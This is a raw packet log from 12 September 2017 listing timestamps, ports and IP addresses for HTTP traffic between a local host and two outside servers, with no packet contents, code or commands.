Sep 12, 2017 22:18:53.552839041 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.586082935 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.586116076 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.586436033 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.586469889 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.586786032 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.586801052 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.586813927 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.586972952 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.586985111 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.587198019 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.587224007 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.587250948 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.587264061 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.587802887 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.607655048 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.607945919 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.608308077 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.608318090 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.608324051 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.608586073 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.621381998 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.621798992 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.624635935 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.624962091 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.625133038 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.625159025 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.625170946 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.628859997 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.639731884 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.639772892 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.639805079 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.640105963 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.646284103 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.646315098 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.646323919 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.646533012 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.646568060 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.654781103 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.654813051 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.655025005 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.655057907 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.671545029 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.671581984 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.671780109 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.671813011 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.677743912 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.677776098 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.677819014 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.678056002 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.678088903 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.678126097 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.712250948 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.712280035 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.712326050 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.712625980 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.717577934 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.717616081 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.717627048 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.717863083 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.736063004 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.736356974 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.736371994 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.736401081 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.736426115 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.736814976 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.749567986 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.749608040 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.749639034 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.749927998 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.768074989 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.768117905 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.768135071 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.768349886 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.768385887 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.777324915 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.777359009 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.777561903 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.777596951 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.815159082 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.815180063 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.815191031 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.815361977 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.815396070 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.816193104 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.816217899 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.816246033 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.816406965 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.816451073 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.816519022 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.821161032 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.821340084 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.854448080 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.854482889 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.854495049 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.854672909 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.856687069 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.856714964 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.856733084 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.856856108 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.869616032 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.869856119 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.880049944 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.880089045 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.880106926 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.880390882 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.894021034 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.894056082 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.894073963 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.894289970 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.894325972 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.894349098 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.894365072 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.894759893 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.894784927 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.935488939 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.935513020 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.935519934 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.935924053 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.935946941 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.958957911 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.959013939 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.959316015 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.959336042 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.974761963 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.974786997 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.975358009 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.975373983 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.975380898 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.975554943 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:53.975581884 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:53.975620985 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:53.997548103 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:53.997862101 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.014580965 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.014592886 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.014596939 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.015614986 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.015635967 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.016076088 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.017033100 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.017052889 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.017065048 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.017728090 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.038569927 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.038605928 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.038614988 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.038861990 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.055321932 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.055358887 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.055372000 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.055578947 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.077152014 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.077192068 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.077202082 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.077394009 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.078574896 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.078695059 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.079348087 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.079364061 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.079372883 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.079474926 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.087268114 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.087305069 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.087318897 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.087587118 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.109939098 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.109973907 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.110168934 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.110213041 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.118230104 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.118247032 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.118506908 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.118534088 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.143536091 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.143574953 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.143940926 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.143968105 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.149480104 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.149496078 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.149905920 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.149930000 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.185161114 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.185188055 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.185198069 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.185429096 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.185722113 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.185738087 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.185745955 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.185846090 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.197568893 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.204801083 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.239593983 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.239633083 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.239644051 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.239958048 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.248341084 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.248363018 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.248378038 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.248646021 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.255680084 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.255697966 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.255705118 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.256347895 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.261509895 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.261533022 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.261540890 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.264684916 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.270572901 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.270602942 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.289630890 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.289649010 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.289664030 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.289818048 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.289850950 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.295255899 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.295288086 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.295455933 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.295488119 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.296097040 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.296113014 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.296529055 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.296552896 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.310314894 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.310334921 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.310373068 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.310547113 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.310565948 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.310589075 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.366946936 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.366966963 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.366974115 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.367419004 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.381112099 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.381133080 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.381139994 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.381335020 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.382092953 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.382112026 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.382122993 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.382913113 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.382927895 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.383450031 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.383474112 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.384793043 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.429456949 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.429478884 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.429486990 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.429951906 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.429971933 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.439073086 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.439090967 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.439393044 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.439410925 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.439416885 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.439420938 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.439424992 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.439909935 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.445178986 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.480211973 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.480242014 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.480269909 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.480580091 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.480617046 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.480663061 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.513407946 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.513675928 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.517687082 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.517713070 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.517720938 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.517965078 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.542427063 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.542468071 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.542475939 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.542761087 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.550602913 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.550648928 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.550666094 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.550870895 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.551687956 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.551717043 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.551734924 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.551904917 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.597337961 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.597368956 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.597374916 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.597523928 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.597548962 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.600397110 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.600421906 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.600569010 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.600601912 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.637557030 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.637590885 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.637839079 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.637881994 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.639655113 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.639679909 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.639997959 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.640032053 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.672609091 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.672921896 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.677676916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.677711964 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.677721024 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.677927971 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.696635962 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.696677923 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.696696997 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.696901083 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.702454090 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.702498913 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.702531099 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.702740908 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.712407112 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.712505102 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.712522984 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.712857008 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.751671076 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.751708984 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.751733065 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.751945019 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.751988888 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.752276897 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.752302885 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.752541065 MESZ	49199	80	192.168.1.16	91.219.236.207
